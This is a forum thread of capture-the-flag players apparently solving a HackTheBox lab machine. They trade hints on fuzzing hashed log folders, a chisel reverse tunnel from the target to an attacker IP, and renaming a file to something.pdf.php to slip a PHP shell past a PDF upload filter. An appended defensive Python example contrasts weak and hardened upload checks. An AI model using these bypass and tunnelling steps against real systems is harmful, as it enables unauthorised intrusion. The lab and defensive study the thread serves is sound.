Posts: 0 Threads: 0 Joined: N/A
August 6, 2022 at 8:59 PM

> (August 6, 2022, 08:05 PM)karhu Wrote:
> Found three additional reports to the ones posted in the blog:
> 2589 3478 4221 7612 8121 9798
> Of note, on 9798, this is listed:
> [+] LOGS : logs/e21cece511f43a5cb18d4932429915ed/
> Page shows nothing, and returns a blank index.html with wget.
> Three new domains are listed in the reports, but I don't think any have to do with the machine:
> healtharcade.io.htb actionmeter.org.htb bethebest101.uk.htb

> (August 6, 2022, 08:09 PM)farkow Wrote:
> Exactly, and when you check e21cece511f43a5cb18d4932429915ed on crackstation, it shows the id of the report. So, the question is, when you md5 all those available reports and check their logs folder, will there be any file discovery?

> (August 6, 2022, 08:30 PM)karhu Wrote:
> Right, this is what I'm working on currently, but I'm not making much headway. Running ffuf on /HASH/FUZZ where HASH is the list of md5(report#) and FUZZ is a list of common filenames. All that has returned so far is just index.html, which are all empty.

> (August 6, 2022, 08:34 PM)paulwatson42016 Wrote:
> There is logs.pdf in md5 of one of the report numbers. It shows file upload page and you see it on there having php shell upload.

Where the pdf file is uploaded?

Posts: 56 Threads: 0 Joined: N/A
August 6, 2022 at 9:08 PM

> (August 6, 2022, 08:59 PM)nhocit Wrote:
> Where the pdf file is uploaded?

I believe it's uploaded to /logs/uploads. Found that directory while enumerating the site. Not sure if/how the filenames are manipulated before storage, though.

EDIT: I confirmed that you can just do /logs/uploads/<file>.pdf to find the upload.

Posts: 70 Threads: 0 Joined: N/A
August 6, 2022 at 9:10 PM

> (August 6, 2022, 08:59 PM)nhocit Wrote:
> Where the pdf file is uploaded?

Did not you FUZZ /logs folder already?

Posts: 26 Threads: 0 Joined: N/A
August 6, 2022 at 9:12 PM

cat /usr/local/sbin/startup.sh
#!/bin/sh
/usr/bin/php -S 127.0.0.1:8080 -t /opt/site.new/

Posts: 0 Threads: 0 Joined: N/A
August 6, 2022 at 9:23 PM

> (August 6, 2022, 09:10 PM)farkow Wrote:
> Did not you FUZZ /logs folder already?

Got it already!

Posts: 132 Threads: 0 Joined: N/A
August 6, 2022 at 10:22 PM

> (August 6, 2022, 09:12 PM)loge23 Wrote:
> cat /usr/local/sbin/startup.sh
> #!/bin/sh
> /usr/bin/php -S 127.0.0.1:8080 -t /opt/site.new/

On your machine: chisel server -p 3477 --reverse
On target: ./chisel client YOUR-IP:3477 R:socks
Add 127.0.0.1 moderators.htb to /etc/hosts
You can now access moderators.htb:8080 using FoxyProxy, for example.

Posts: 24 Threads: 0 Joined: N/A
August 7, 2022 at 12:20 AM

Any hint for how to bypass pdf filter? Won't let me upload even normal pdf :s

Posts: 132 Threads: 0 Joined: N/A
August 7, 2022 at 12:24 AM

> (August 7, 2022, 12:20 AM)vexxxi Wrote:
> Any hint for how to bypass pdf filter? Won't let me upload even normal pdf :s

You have to set the name like something.pdf.php and keep the pdf first line and last line format.

Posts: 24 Threads: 0 Joined: N/A
August 7, 2022 at 12:49 AM

> (August 7, 2022, 12:24 AM)fironeDerbert Wrote:
> You have to set the name like something.pdf.php and keep the pdf first line and last line format.

Just tried that and wasn't able to get it to go through, just always says only pdfs allowed. It should be getting uploaded to /logs/uploads/, right?

Posts: 132 Threads: 0 Joined: N/A
August 7, 2022 at 1:12 AM

> (August 7, 2022, 12:49 AM)vexxxi Wrote:
> Just tried that and wasn't able to get it to go through, just always says only pdfs allowed. It should be getting uploaded to /logs/uploads/, right?

Try to upload a regular pdf and see how the filter works, and yes, the file will be uploaded in /logs/uploads.
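
Added example, not part of any post in this thread and not the machine's real upload code: a defender's view of why an upload check based on ".pdf" in the name plus the PDF first and last line is not enough, next to a stricter check. The function names, the extension list and the sample bytes are assumptions constructed for illustration.

```python
import os
import secrets

# Assumed list of extensions a PHP-capable web server might execute.
EXECUTABLE_EXTS = {"php", "phtml", "php3", "php4", "php5", "php7", "phar", "pht"}

# Constructed sample: valid PDF first and last line, inert PHP tag in between.
SAMPLE = b"%PDF-1.4\n<?php /* placeholder, no payload */ ?>\n%%EOF\n"


def naive_filter(filename: str, data: bytes) -> bool:
    """Assumed weak check: '.pdf' anywhere in the name, PDF header and trailer."""
    return (
        ".pdf" in filename.lower()
        and data.startswith(b"%PDF-")
        and data.rstrip().endswith(b"%%EOF")
    )


def hardened_filter(filename: str, data: bytes):
    """Return (accepted, reason, stored_name); stored_name is chosen by the server."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    # The LAST extension decides how the web server treats the file.
    if len(parts) < 2 or parts[-1] != "pdf":
        return (False, "final extension is not .pdf", None)
    # Reject names such as x.php.pdf, which some multi-extension configs execute.
    if any(p in EXECUTABLE_EXTS for p in parts[1:-1]):
        return (False, "executable extension inside name", None)
    if not data.startswith(b"%PDF-") or not data.rstrip().endswith(b"%%EOF"):
        return (False, "missing PDF header or trailer", None)
    # Header/trailer checks cannot prove the body is harmless, so the client
    # name is never reused: store under a random name with a fixed extension.
    return (True, "ok", secrets.token_hex(16) + ".pdf")


if __name__ == "__main__":
    for name in ("something.pdf.php", "x.php.pdf", "report.pdf"):
        print(name, naive_filter(name, SAMPLE), hardened_filter(name, SAMPLE))
```

The stricter check still accepts the sample bytes under a .pdf name, which is why the upload directory should also be served with script execution disabled, or kept outside the web root.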